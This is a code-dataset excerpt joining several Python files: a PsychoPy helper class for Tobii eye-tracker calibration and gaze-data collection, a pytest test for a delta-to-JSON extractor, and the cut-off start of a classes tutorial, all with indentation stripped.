# function for converting from tobiis ada coordinate system in normalized
# coordinates where (0,0) is the upper left corner, to psychopy window
# coordinates in pix, where (0,0) is at the center of psychopy window.
def ada2PsychoPix(self, xyCoor = tuple):
# check argument values
if xyCoor is None:
raise ValueError("No coordinate values have been specified.")
elif not isinstance(xyCoor, tuple):
raise TypeError("XY coordinates must be given as tuple.")
elif isinstance(xyCoor, tuple) and len(xyCoor) is not 2:
raise ValueError("Wrong number of coordinate dimensions")
if np.isnan(xyCoor[0]) and np.isnan(xyCoor[1]):
psychoPix = (np.nan, np.nan)
return psychoPix
# convert to pixels and correct for psychopy window coordinates
monHW = (self.win.getSizePix()[0],
self.win.getSizePix()[1])
wShift, hShift = monHW[0] / 2 , monHW[1] / 2
psychoPix = ((((xyCoor[0]* monHW[0]) - wShift)),
(((xyCoor[1] * monHW[1]) - hShift) * -1))
# return coordinates in psychowin 'pix' units
return psychoPix
# function for converting from tobiis active display coordinate system in
# normalized coordinates where (0,0) is the upper left corner, to monitor
# coordinates in pix, where (0,0) is the upper left corner
def ada2MonPix(self, xyCoor = tuple):
# check argument values
if xyCoor is None:
raise ValueError("No coordinate values have been specified.")
elif not isinstance(xyCoor, tuple):
raise TypeError("XY coordinates must be given as tuple.")
elif isinstance(xyCoor, tuple) and len(xyCoor) is not 2:
raise ValueError("Wrong number of coordinate dimensions")
if np.isnan(xyCoor[0]) and np.isnan(xyCoor[1]):
monPix = (np.nan, np.nan)
return monPix
# convert so point of gaze on monitor is accurate
monPix = (int(xyCoor[0] * self.win.getSizePix()[0]),
int(xyCoor[1] * self.win.getSizePix()[1]))
return monPix
# ----- Functions for collecting eye and gaze data -----
# function for collecting gaze coordinates in psychopy pixel coordinate
# system. currently written to return the average (x, y) position of both
# eyes, but can be easily rewritten to return data from one or both eyes
def getAvgGazePos(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# access gaze data dictionary to get gaze position tuples
lGazeXYZ = self.gazeData['left_gaze_point_on_display_area']
rGazeXYZ = self.gazeData['right_gaze_point_on_display_area']
# get 2D gaze positions for left and right eye
xs = (lGazeXYZ[0], rGazeXYZ[0])
ys = (lGazeXYZ[1], rGazeXYZ[1])
# if all of the axes have data from at least one eye
if all([x != -1.0 for x in xs]) and all([y != -1.0 for y in ys]):
# take x and y averages
avgGazePos = np.nanmean(xs), np.nanmean(ys)
else:
# or if no data, hide points by showing off screen
avgGazePos = (np.nan, np.nan)
return self.ada2PsychoPix(avgGazePos)
# function for finding the avg 3d position of subject's eyes, so that they
# can be drawn in the virtual track box before calibration. The x and y
# coordinates are returned in normalized "tobii track box" units.
def trackboxEyePos(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# access gaze data dictionary to get eye position tuples,
# in trackbox coordinate system
lTbXYZ = self.gazeData['left_gaze_origin_in_trackbox_coordinate_system']
rTbXYZ = self.gazeData['right_gaze_origin_in_trackbox_coordinate_system']
# left eye validity
lVal = self.gazeData['left_gaze_origin_validity']
# right eye validity
rVal = self.gazeData['right_gaze_origin_validity']
# if left eye is found by the eyetracker
if lVal == 1:
# update the left eye positions if the values are reasonable
# scale left eye position so that it fits in track box
leftTbPos = (-self.tb2PsychoNorm((lTbXYZ[0],
lTbXYZ[1]))[0] * 1.7,
self.tb2PsychoNorm((lTbXYZ[0],
lTbXYZ[1]))[1])
else:
# hide by drawing in the corner
leftTbPos = [0.99, 0.99]
# if right eye is found by the eyetracker
if rVal == 1:
# update the right eye positions if the values are reasonable
# scale right eye position so that it fits in track box
rightTbPos = (-self.tb2PsychoNorm((rTbXYZ[0], rTbXYZ[1]))[0] * 1.7,
self.tb2PsychoNorm((rTbXYZ[0],
rTbXYZ[1]))[1])
else:
# hide by drawing in the corner
rightTbPos = [0.99, 0.99]
# return values for positio in track box
return leftTbPos, rightTbPos
# x, y, and z dimensions are given in mm from the tracker origin, gives the
# average 3d position of both eyes, but can be easily rewritten to yield
# the position of each eye separately
def getAvgEyePos(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# access gaze data dictionary to get eye position tuples, given in
# mm in from eyetracker origin
lOriginXYZ = self.gazeData['left_gaze_origin_in_user_coordinate_system']
rOriginXYZ = self.gazeData['right_gaze_origin_in_user_coordinate_system']
# create arrays with positions of both eyes on x, y, and z axes
xs = (lOriginXYZ[0],rOriginXYZ[0])
ys = (lOriginXYZ[1],rOriginXYZ[1])
zs = (lOriginXYZ[2],rOriginXYZ[2])
# if all of the axes have data from at least one eye
if not (np.isnan(xs)).all() or not (np.isnan(ys)).all() or not (np.isnan(zs)).all():
# update the distance if the values are reasonable
avgEyePos = (np.nanmean(xs), np.nanmean(ys), np.nanmean(zs))
else:
# otherwise set to zero
avgEyePos = (0, 0, 0)
# return average eye position in mm
return avgEyePos
# get average distance of the eyes from the tracker origin, given in cm
def getAvgEyeDist(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# get eye positions
eyeCoors = self.getAvgEyePos()
# if eyes were found
if sum(eyeCoors) > 0:
# calculate the euclidean distance of eyes from tracker origin
avgEyeDist = distance.euclidean((eyeCoors[0]/10,
eyeCoors[1]/10,
eyeCoors[2]/10), (0, 0, 0))
else: # if eyes were not found, return zero values
avgEyeDist = 0
# return distance value in cm
return avgEyeDist
# get average size of pupils in mm, can easily be rewritten to return
# pupil size values for both eyes
def getPupilSize(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
lPup = self.gazeData['left_pupil_diameter']
rPup = self.gazeData['right_pupil_diameter']
pupSizes = (lPup, rPup)
# if pupils were found
if lPup != -1 and rPup != -1:
avgPupSize = np.nanmean(pupSizes)
else: # otherwise return zero
avgPupSize = (0.0)
# return pupil size
return avgPupSize
# check the validities of right and left eyes, returns as a tuple of
# true/false values
def checkEyeValidities(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# get validity values
lVal = self.gazeData['left_gaze_origin_validity']
rVal = self.gazeData['right_gaze_origin_validity']
# default validity value
validities = 0 # neither eye is valid
# if both eyes are valid, return 3
if lVal == 1 and rVal == 1:
validities = 3
# if just left eye is valid, return 1
elif lVal == 1 and rVal == 0:
validities = 1
# if just right eye is valid, return 2
elif lVal == 0 and rVal == 1 :
validities = 2
# return validity values
return validities
# ----- Functions for running calibration -----
# function for drawing representation of the eyes in virtual trackbox
def drawEyePositions(self, psychoWin):
# check that psychopy window exists
if psychoWin is None:
raise ValueError("There is no psychopy window available. " +\
"Try calling runTrackbox() instead.")
# Set default colors
correctColor = [-1.0, 1.0, -1.0]
mediumColor = [1.0, 1.0, 0.0]
wrongColor = [1.0, -1.0, -1.0]
# rectangle for viewing eyes
rectScale = self.tb2Ada((1, 1))
eyeArea = visual.Rect(psychoWin,
fillColor = [0.0, 0.0, 0.0],
lineColor = [0.0, 0.0, 0.0],
pos = [0.0, 0.0],
units = 'norm',
lineWidth = 3,
width = rectScale[0],
height = rectScale[1])
# Make stimuli for the left and right eye
leftStim = visual.Circle(psychoWin,
fillColor = eyeArea.fillColor,
units = 'norm',
radius = 0.07)
rightStim = visual.Circle(psychoWin,
fillColor = eyeArea.fillColor,
units = 'norm',
radius = 0.07)
# Make a dummy message
findmsg = visual.TextStim(psychoWin,
text = " ",
color = [1.0, 1.0, 1.0],
units = 'norm',
pos = [0.0, -0.65],
height = 0.07)
# while tracking
while True:
# find and update eye positions
leftStim.pos, rightStim.pos = self.trackboxEyePos()
eyeDist = self.getAvgEyeDist()
# change color depending on distance
if eyeDist >= 55 and eyeDist <= 75:
# correct distance
leftStim.fillColor, leftStim.lineColor = correctColor, correctColor
rightStim.fillColor, rightStim.lineColor = correctColor, correctColor
elif eyeDist <= 54 and eyeDist >= 45 or eyeDist >= 76 and eyeDist <= 85:
leftStim.fillColor, leftStim.lineColor = mediumColor, mediumColor
rightStim.fillColor, rightStim.lineColor = mediumColor, mediumColor
else:
# not really correct
leftStim.fillColor, leftStim.lineColor = wrongColor, wrongColor
rightStim.fillColor, rightStim.lineColor = wrongColor, wrongColor
# if left eye is not found, don't display eye
if leftStim.pos[0] == 0.99:
leftStim.fillColor = psychoWin.color # make the same color as bkg
leftStim.lineColor = psychoWin.color
# if right eye is not found, don't display eye
if rightStim.pos[0] == 0.99:
rightStim.fillColor = psychoWin.color # make same color as bkg
rightStim.lineColor = psychoWin.color
# give distance feedback
findmsg.text = "You're currently " + \
str(int(eyeDist)) + \
("cm away from the screen. \n"
"Press 'c' to calibrate or 'q' to abort.")
# update stimuli in window
eyeArea.draw()
leftStim.draw()
rightStim.draw()
findmsg.draw()
psychoWin.flip()
# depending on response, either abort script or continue to calibration
if event.getKeys(keyList=['q']):
self.stopGazeData()
psychoWin.close()
pcore.quit()
raise KeyboardInterrupt("You aborted the script manually.")
elif event.getKeys(keyList=['c']):
print("Proceeding to calibration.")
self.stopGazeData()
psychoWin.flip()
return
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# function for running validation routine post calibration to check
# calibration precision and accuracy
def runValidation(self, pointDict = dict):
# check the values of the point dictionary
if pointDict is None:
print('pointDict has no value. Using 5 point default.')
pointList = [('1',(0.1, 0.1)), ('2',(0.9, 0.1)), ('3',(0.5, 0.5)),
('4',(0.1, 0.9)), ('5',(0.9, 0.9))]
pointDict = collections.OrderedDict(pointList)
if not isinstance(pointDict, dict):
raise TypeError('pointDict must be a dictionary with number ' +\
'keys and coordinate values.')
# check window attribute
if self.win is None:
raise ValueError('No experimental monitor has been specified.\n' +\
'Try running setMonitor().')
# start eyetracker
self.startGazeData()
# let it warm up briefly
pcore.wait(0.5)
# get points from dictionary
curPoints = pointDict.values()
# convert points from normalized ada units to psychopy pix
pointPositions = [self.ada2PsychoPix(x) for x in curPoints]
# window stimuli
valWin = visual.Window(size = [self.win.getSizePix()[0],
self.win.getSizePix()[1]],
pos = [0, 0],
units = 'pix',
fullscr = True,
allowGUI = True,
monitor = self.win,
winType = 'pyglet',
color = [0.8, 0.8, 0.8])
# stimuli for showing point of gaze
gazeStim = visual.Circle(valWin,
radius = 50,
lineColor = [1.0, 0.95, 0.0], # yellow circle
fillColor = [1.0, 1.0, 0.55], # light interior
lineWidth = 40,
units = 'pix')
# Make a dummy message
valMsg = visual.TextStim(valWin,
text = 'Wait for the experimenter.',
color = [0.4, 0.4, 0.4], # grey
units = 'norm',
pos = [0.0, -0.5],
height = 0.07)
# Stimuli for all validation points
valPoints = visual.Circle(valWin,
units = "pix",
radius = 20,
lineColor = [1.0, -1.0, -1.0], # red
fillColor = [1.0, -1.0, -1.0]) # red
# create array for smoothing gaze position
gazePositions = np.array([0.0, 0.0])
maxLength = 6
# while tracking
while True:
# smooth gaze data with moving window
gazePositions = np.vstack((gazePositions,
np.array(self.getAvgGazePos())))
curPos = np.nanmean(gazePositions, axis = 0)
# remove previous position values
if len(gazePositions) == maxLength:
gazePositions = np.delete(gazePositions, 0, axis = 0)
# update stimuli in window and draw
drawStim = self.ada2PsychoPix(tuple(curPos))
# draw gaze position only if found
if drawStim[0] is not self.win.getSizePix()[0]:
gazeStim.pos = drawStim
gazeStim.draw()
# points
for point in pointPositions:
valPoints.pos = point
valPoints.draw()
# text
valMsg.draw()
valWin.flip()
# depending on response, either abort script or continue to calibration
if event.getKeys(keyList=['q']):
valWin.close()
self.stopGazeData()
pcore.quit()
raise KeyboardInterrupt("You aborted the script manually.")
elif event.getKeys(keyList=['c']):
valWin.close()
print("Exiting calibration validation.")
self.stopGazeData()
return
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# function for getting the average left and right gaze position coordinates
# for each calibration point in psychopy pix units
def calculateCalibration(self, calibResult):
# check the values of the point dictionary
if calibResult is None:
raise ValueError('No argument passed for calibResult')
#create an empty list to hold values
calibDrawCoor = []
# iterate through calibration points
for i in range(len(calibResult.calibration_points)):
# current point
curPoint = calibResult.calibration_points[i]
pointPosition = curPoint.position_on_display_area # point position
pointSamples = curPoint.calibration_samples # samples at point
# empty arrays for holding left and right eye gaze coordinates
leftOutput = np.zeros((len(pointSamples), 2))
rightOutput = np.zeros((len(pointSamples), 2))
# find left and right gaze coordinates for all samples in point
for j in range(len(pointSamples)):
curSample = pointSamples[j]
leftEye = curSample.left_eye
rightEye = curSample.right_eye
leftOutput[j] = leftEye.position_on_display_area
rightOutput[j] = rightEye.position_on_display_area
# get average x and y coordinates using all samples in point
lXY = tuple(np.mean(leftOutput, axis = 0))
rXY = tuple(np.mean(rightOutput, axis = 0))
point = tuple((pointPosition[0], pointPosition[1]))
# put current calibration point coordinates , l and r eye coordinates
# into list, and convert to psychopy window coordinates in pix
newList = [self.ada2PsychoPix(point), self.ada2PsychoPix(lXY),
self.ada2PsychoPix(rXY), pointPosition]
calibDrawCoor.insert(i, newList)
# for some weird reason my calibration always includes the point (0,0) at
# index 0, so just remove it here
calibDrawCoor.pop(0)
# return as list
return(calibDrawCoor)
# function for drawing the results of the calibration
def drawCalibrationResults(self, calibResult = None, calibWin = None, curDict = dict):
# check argument values
if self.calibration is None:
raise ValueError('No calibration object exists.')
# check values of calibration result
if calibResult is None:
raise ValueError('No calibration result object given.')
# check the values of the point dictionary
if curDict is None:
raise ValueError('No dictionary object given.')
elif not isinstance(curDict, dict):
raise TypeError('curDict must be a dictionary with number \n' +\
'keys and coordinate values.')
# check value of calibration window
if calibWin is None:
raise ValueError('No psychopy window object given.')
# get gaze position results
points2Draw = self.calculateCalibration(calibResult)
# create stimuli objects for drawing
# outlined empty circle object for showing calibration point
calibPoint = visual.Circle(calibWin,
radius = 50,
lineColor = [1.0, 1.0, 1.0], # white
lineWidth = 10,
fillColor = calibWin.color,
units = 'pix',
pos = (0.0, 0.0))
# line object for showing right eye gaze position during calibration
rightEyeLine = visual.Line(calibWin,
units ='pix',
lineColor ='red',
lineWidth = 20,
start = (0.0, 0.0),
end = (0.0, 0.0))
# line object for showing left eye gaze position during calibration
leftEyeLine = visual.Line(calibWin,
units ='pix',
lineColor ='yellow',
lineWidth = 20,
start = (0.0, 0.0),
end = (0.0, 0.0))
# number for identifying point in dictionary
pointText = visual.TextStim(calibWin,
text = " ",
color = [0.8, 0.8, 0.8], # lighter than bkg
units = 'pix',
pos = [0.0, 0.0],
height = 60)
# Make a dummy message
checkMsg = visual.TextStim(calibWin,
text = 'Wait for the experimenter.',
color = [1.0, 1.0, 1.0],
units = 'norm',
pos = [0.0, -0.5],
height = 0.07)
# make empty dictionary for holding points to be recalibrated
holdRedoDict = []
holdColorPoints = []
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# draw and update screen
while True:
# iterate through calibration points and draw
for i in range(len(points2Draw)):
# update point and calibraiton results for both eyes
point = points2Draw[i]
pointPos = point[3]
pointKey = 0
# update text
for key, point in curDict.items():
if point == pointPos:
pointText.text = key
pointKey = key
# if current point is selected for recalibrate, make it noticeable
if int(pointKey) in holdColorPoints:
calibPoint.lineColor = [-1.0, 1.0, -1.0] # green circle
else:
calibPoint.lineColor = [1.0, 1.0, 1.0] # no visible change
# update point and calibraiton results for both eyes
point = points2Draw[i]
startCoor, leftCoor, rightCoor = point[0], point[1], point[2]
# update positions and draw on window
calibPoint.pos = startCoor # calibration point
leftEyeLine.start = startCoor # left eye
leftEyeLine.end = leftCoor
rightEyeLine.start = startCoor # right eye
rightEyeLine.end = rightCoor
pointText.pos = startCoor # point text
# update stimuli in window
calibPoint.draw() # has to come first or else will cover other
# stim
pointText.draw()
leftEyeLine.draw()
rightEyeLine.draw()
checkMsg.draw()
# show points and lines on window
calibWin.flip()
# determine problem points
# list of acceptable key input !!IF PRESSED KEYS ARE NOT IN KEYLIST, KEYBOARD EVENT MAY CRASH!!
pressedKeys = event.getKeys(keyList = ['c', 'q', '1', '2', '3', '4',
'5', '6', '7', '8', '9'])
# depending on response, either...
# abort script
for key in pressedKeys:
if key in ['q']:
calibWin.close()
self.calibration.leave_calibration_mode()
pcore.quit()
raise KeyboardInterrupt("You aborted the script manually.")
# else if recalibration point is requested
elif key in curDict.keys():
# iterate through each of these presses
for entry in curDict.items():
# if the key press is the same as the current dictionary key
if entry[0] == key:
# append that dictionary entry into a holding dictionary
holdRedoDict.append(entry)
# append integer version to a holding list
holdColorPoints.append(int(key))
# continue with calibration procedure
elif key in ['c']:
print("Finished checking. Resuming calibration.")
checkMsg.pos = (0.0, 0.0)
checkMsg.text = ("Finished checking. Resuming calibration.")
checkMsg.draw()
calibWin.flip()
# return dictionary of points to be recalibration
redoDict = collections.OrderedDict([]) # empty dictionary for holding unique values
# dont put repeats in resulting dictionary
tempDict = collections.OrderedDict(holdRedoDict)
for keys in tempDict.keys():
if keys not in redoDict.keys():
redoDict[keys] = tempDict.get(keys)
# return dictionary
return redoDict
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# function for drawing calibration points, collecting and applying
# calibration data
def getCalibrationData(self, calibWin, pointList = list):
# check argument values
if self.calibration is None:
raise ValueError('No calibration object exists.\n' +\
'Try running runFullCalibration()')
# check value of calibration window
if calibWin is None:
raise ValueError('No psychopy window object given')
# check the values of the point dictionary
if pointList is None:
raise ValueError('No list object given for pointList.')
elif not isinstance(pointList, list):
raise TypeError('pointList must be a list of coordinate tuples.')
# defaults
pointSmallRadius = 5.0 # point radius
pointLargeRadius = pointSmallRadius * 10.0
moveFrames = 50 # number of frames to draw between points
startPoint = (0.90, 0.90) # starter point for animation
# calibraiton point visual object
calibPoint = visual.Circle(calibWin,
radius = pointLargeRadius,
lineColor = [1.0, -1.0, -1.0], # red
fillColor = [1.0, -1.0, -1.0],
units = 'pix')
# draw animation for each point
# converting psychopy window coordinate units from normal to px
for i in range(len(pointList)):
# if first point draw starting point
if i == 0:
firstPoint = [startPoint[0], startPoint[1]]
secondPoint = [pointList[i][0], pointList[i][1]]
else:
firstPoint = [pointList[i - 1][0], pointList[i - 1][1]]
secondPoint = [pointList[i][0], pointList[i][1]]
# draw and move dot
# step size for dot movement is new - old divided by frames
pointStep = [((secondPoint[0] - firstPoint[0]) / moveFrames),
((secondPoint[1] - firstPoint[1]) / moveFrames)]
# Move the point in position (smooth pursuit)
for frame in range(moveFrames - 1):
firstPoint[0] += pointStep[0]
firstPoint[1] += pointStep[1]
# draw & flip
calibPoint.pos = self.ada2PsychoPix(tuple(firstPoint))
calibPoint.draw()
calibWin.flip()
# wait to let eyes settle
pcore.wait(0.5)
# allow the eye to focus before beginning calibration
# point size change step
radiusStep = ((pointLargeRadius - pointSmallRadius) / moveFrames)
# Shrink the outer point (gaze fixation) to encourage focusing
for frame in range(moveFrames):
pointLargeRadius -= radiusStep
calibPoint.radius = pointLargeRadius
calibPoint.draw()
calibWin.flip()
# first wait to let the eyes settle
pcore.wait(0.5)
# conduct calibration of point
print("Collecting data at {0}." .format(i + 1))
while self.calibration.collect_data(pointList[i][0],
pointList[i][1]) != tobii.CALIBRATION_STATUS_SUCCESS:
self.calibration.collect_data(pointList[i][0],
pointList[i][1])
# feedback from calibration
print("{0} for data at point {1}."
.format(self.calibration.collect_data(pointList[i][0],
pointList[i][1]), i + 1))
pcore.wait(0.3) # wait before continuing
# Return point to original size
for frame in range(moveFrames):
pointLargeRadius += radiusStep
calibPoint.radius = pointLargeRadius
calibPoint.draw()
calibWin.flip()
# let the eyes settle and move to the next point
pcore.wait(0.2)
# check to quit
# depending on response, either abort script or continue to calibration
if event.getKeys(keyList=['q']):
calibWin.close()
self.calibration.leave_calibration_mode()
raise KeyboardInterrupt("You aborted the script manually.")
return
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# clear screen
calibWin.flip()
# print feedback
print("Computing and applying calibration.")
# compute and apply calibration to get calibration result object
calibResult = self.calibration.compute_and_apply()
# return calibration result
return calibResult
# function for running simple gui to visualize subject eye position. Make
# sure that the eyes are in optimal location for eye tracker
def runTrackBox(self):
# check to see that eyetracker is connected
if self.eyetracker is None:
raise ValueError('There is no eyetracker object. \n' +\
'Try running findTracker().')
# check window attribute
if self.win is None:
raise ValueError('No experimental monitor has been specified.\n' +\
'Try running setMonitor().')
# start the eyetracker
self.startGazeData()
# wait for it ot warm up
pcore.wait(0.5)
# create window for visualizing eye position and text
trackWin = visual.Window(size = [self.win.getSizePix()[0],
self.win.getSizePix()[1]],
pos = [0, 0],
units = 'pix',
fullscr = True,
allowGUI = True,
monitor = self.win,
winType = 'pyglet',
color = [0.4, 0.4, 0.4])
# feedback about eye position
self.drawEyePositions(trackWin)
# close track box
pcore.wait(2)
trackWin.close()
return
# function for running a complete calibration routine
def runFullCalibration(self, numCalibPoints = None):
# check that eyetracker is connected before running
if self.eyetracker is None: # eyeTracker
raise ValueError("No eyetracker is specified. " +\
"Aborting calibration.\n" +\
"Try running findTracker().")
# check window attribute
if self.win is None:
raise ValueError('No experimental monitor has been specified.\n' +\
'Try running setMonitor().')
# create dictionary of calibration points
# if nothing entered then default is nine
if numCalibPoints is None:
pointList = [('1',(0.1, 0.1)), ('2',(0.5, 0.1)), ('3',(0.9, 0.1)),
('4',(0.1, 0.5)), ('5',(0.5, 0.5)), ('6',(0.9, 0.5)),
('7',(0.1, 0.9)), ('8',(0.5, 0.9)), ('9',(0.9, 0.9))]
elif numCalibPoints is 5:
pointList = [('1',(0.1, 0.1)), ('2',(0.9, 0.1)), ('3',(0.5, 0.5)),
('4',(0.1, 0.9)), ('5',(0.9, 0.9))]
elif numCalibPoints is 9:
pointList = [('1',(0.1, 0.1)), ('2',(0.5, 0.1)), ('3',(0.9, 0.1)),
('4',(0.1, 0.5)), ('5',(0.5, 0.5)), ('6',(0.9, 0.5)),
('7',(0.1, 0.9)), ('8',(0.5, 0.9)), ('9',(0.9, 0.9))]
# randomize points as ordered dictionary
np.random.shuffle(pointList)
calibDict = collections.OrderedDict(pointList)
# create window for calibration
calibWin = visual.Window(size = [self.win.getSizePix()[0],
self.win.getSizePix()[1]],
pos = [0, 0],
units = 'pix',
fullscr = True,
allowGUI = True,
monitor = self.win,
winType = 'pyglet',
color = [0.4, 0.4, 0.4])
# stimuli for holding text
calibMessage = visual.TextStim(calibWin,
color = [1.0, 1.0, 1.0], # text
units = 'norm',
height = 0.08,
pos = (0.0, 0.1))
# stimuli for fixation cross
fixCross = visual.TextStim(calibWin,
color = [1.0, 1.0, 1.0],
units = 'norm',
height = 0.1,
pos = (0.0, 0.0),
text = "+")
# track box to position participant
# subject instructions for track box
calibMessage.text = ("Please position yourself so that the\n" + \
"eye-tracker can locate your eyes." + \
"\n\nPress 'c' to continue.")
calibMessage.draw()
calibWin.flip()
# turn keyboard reporting on and get subject response
event.waitKeys(maxWait = 10, keyList = ['c']) # proceed with calibration
#run track box routine
calibWin.flip() # clear previous text
self.runTrackBox()
# initialize calibration
self.calibration = tobii.ScreenBasedCalibration(self.eyetracker) # calib object
# enter calibration mode
self.calibration.enter_calibration_mode()
# subject instructions
calibMessage.text = ("Please focus your eyes on the red dot " + \
"and follow it with your eyes as closely as " + \
"possible.\n\nPress 'c' to continue.")
calibMessage.draw()
calibWin.flip()
# turn keyboard reporting on and get subject response
event.waitKeys(maxWait = 10, keyList = ['c']) # proceed with calibration
# draw a fixation cross
fixCross.draw()
calibWin.flip()
pcore.wait(3)
# create dictionary for holding points to be recalibrated
redoCalDict = calibDict
# loop through calibration process until calibration is complete
while True:
# create point order form randomized dictionary values
pointOrder = list(redoCalDict.values())
# perform calibration
calibResult = self.getCalibrationData(calibWin, pointOrder)
# Check status of calibration result
# if calibration was successful, check calibration results
if calibResult.status != tobii.CALIBRATION_STATUS_FAILURE:
# give feedback
calibMessage.text = ("Applying calibration...")
calibMessage.draw()
calibWin.flip()
pcore.wait(2)
# moving on to accuracy plot
calibMessage.text = ("Calculating calibration accuracy...")
calibMessage.draw()
calibWin.flip()
pcore.wait(2)
# check calibration for poorly calibrated points
redoCalDict = self.drawCalibrationResults(calibResult,
calibWin,
calibDict)
else: # if calibration was not successful, leave and abort
calibMessage.text = ("Calibration was not successful.\n\n" + \
"Closing the calibration window.")
calibMessage.draw()
calibWin.flip()
pcore.wait(3)
calibWin.close()
self.calibration.leave_calibration_mode()
return
# Redo calibration for specific points if necessary
if not redoCalDict: # if no points to redo
# finish calibration
print("Calibration successful. Moving on to validation mode.")
calibMessage.text = ("Calibration was successful.\n\n" + \
"Moving on to validation.")
calibMessage.draw()
calibWin.flip()
pcore.wait(3)
self.calibration.leave_calibration_mode()
# break loop to proceed with validation
break
else: # if any points to redo
# convert list to string for feedback
printString = " ".join(str(x) for x in redoCalDict.keys())
# feedback
print ("Still need to calibrate the following points: %s"
% printString)
calibMessage.text = ("Calibration is almost complete.\n\n" + \
"Prepare to recalibrate a few points.")
calibMessage.draw()
calibWin.flip()
pcore.wait(3)
# draw fixation cross
fixCross.draw()
calibWin.flip()
pcore.wait(3)
# iterate through list of redo points and remove data from calibration
for newPoint in redoCalDict.values():
print(newPoint)
self.calibration.discard_data(newPoint[0], newPoint[1])
# continue with calibration of remaining points
continue
# Validate calibration
# draw fixation cross
fixCross.draw()
calibWin.flip()
pcore.wait(3)
# run validation
self.runValidation(calibDict)
# close window
calibMessage.text = ("Finished validating the calibration.\n\n" +\
"Calibration is complete. Closing window.")
calibMessage.draw()
calibWin.flip()
pcore.wait(3)
calibWin.close()
return
# ----- Functions for exporting gaze data -----
# Function for getting all gaze and event data from the current sample
# collected by the eyetracker, returned as a dictionary. Can easily be
# converted into a pandas dataframe. Strongly suggest putting output into
# a psychopy data object, as psychopy.data comes with many convenient
# functions for organizing experiment flow, recording data, and saving
# files. Gaze position is given in psychopy pixels, eye position, distance, and pupil size
# given in mm.
def getCurrentData(self):
# check gaze Data
if not self.tracking:
raise ValueError("Data is not being recorded by the eyetracker.")
# output file at same frequency as eyetracker
timeCur = np.datetime64(dt.datetime.now())
timeNow = timeCur
timeDelta = np.absolute((timeCur - timeNow)/np.timedelta64(1, 'ms'))
# when two data samples are slightly less than the eyetrackers frequency
# apart, request data from eyetracker
while timeDelta < 7.0: # change according to eyetracker freq
pcore.wait(0.001)
timeNow = np.datetime64(dt.datetime.now())
timeDelta = np.absolute((timeCur - timeNow)/np.timedelta64(1, 'ms'))
# code can easily be modified to get more than averages
timeMidnight = np.datetime64(dt.datetime.date(dt.datetime.today()))
self.currentData = {}
self.currentData['DeviceTimeStamp'] = np.absolute((timeNow - timeMidnight)/np.timedelta64(1, 'ms'))
self.currentData['AvgGazePointX'] = self.getAvgGazePos()[0]
self.currentData['AvgGazePointX'] = self.getAvgGazePos()[0]
self.currentData['AvgGazePointY'] = self.getAvgGazePos()[1]
self.currentData['AvgPupilDiam'] = self. getPupilSize()
self.currentData['AvgEyePosX'] = self.getAvgEyePos()[0]
self.currentData['AvgEyePosY'] = self.getAvgEyePos()[1]
self.currentData['AvgEyePosZ'] = self.getAvgEyePos()[2]
self.currentData['AvgEyeDistance'] = self.getAvgEyeDist() * 10
self.currentData['EyeValidities'] = self.checkEyeValidities()
return self.currentData
| 45.108228
| 108
| 0.51889
|
e72dba85cc70914d2f8cbd7eb914d226103ddb84
| 788
|
py
|
Python
|
tests/test_extractor.py
|
msk-mind/graph-db
|
4272057eb0d30d7c4b6b4429acd21ec90404ff6c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_extractor.py
|
msk-mind/graph-db
|
4272057eb0d30d7c4b6b4429acd21ec90404ff6c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_extractor.py
|
msk-mind/graph-db
|
4272057eb0d30d7c4b6b4429acd21ec90404ff6c
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on May 05, 2021
@author: pashaa@mskcc.org
'''
import glob
import json
import os
import pandas as pd
import shutil
import pytest
from graph_db.common.config import ConfigSet, APP_CFG, DATA_CFG
from graph_db.extractor import delta_to_json
delta_table = 'tests/input_data/user_table'
json_path = 'tests/output_data/user_table'
@pytest.fixture
def setup():
if os.path.exists(json_path):
shutil.rmtree(json_path)
ConfigSet(name=APP_CFG, config_file='tests/test_app_config.yml')
cfg = ConfigSet(name=DATA_CFG, config_file='tests/test_data_config.yml')
def test_delta_to_json(setup):
delta_to_json(delta_table, json_path)
json_file = glob.glob(json_path+'/*.json')[0]
df = pd.read_json(json_file, lines=True)
assert df.shape == (5,6)
| 20.205128
| 76
| 0.742386
|
9137cc4580663edf715cf1eb40e720eb97d038a6
| 1,264
|
py
|
Python
|
Own/Python/Tutorials/Classes.py
|
cychitivav/programming_exercises
|
e8e7ddb4ec4eea52ee0d3826a144c7dc97195e78
|
[
"MIT"
] | null | null | null |
Own/Python/Tutorials/Classes.py
|
cychitivav/programming_exercises
|
e8e7ddb4ec4eea52ee0d3826a144c7dc97195e78
|
[
"MIT"
] | null | null | null |
Own/Python/Tutorials/Classes.py
|
cychitivav/programming_exercises
|
e8e7ddb4ec4eea52ee0d3826a144c7dc97195e78
|
[
"MIT"
] | null | null | null |
#Cristian Chitiva
#cychitivav@unal.edu.co
#13/Sept/2018
class Pencil:
_length = '10 cm'#Class variable notation
def __new__(self, color = 'Rojo', eraser = True, graphite = False):#Constructor
self.__init__(self, color, eraser, graphite)
def __init__(self, color, eraser, graphite):
self.color = color
self.__eraser = eraser#Private
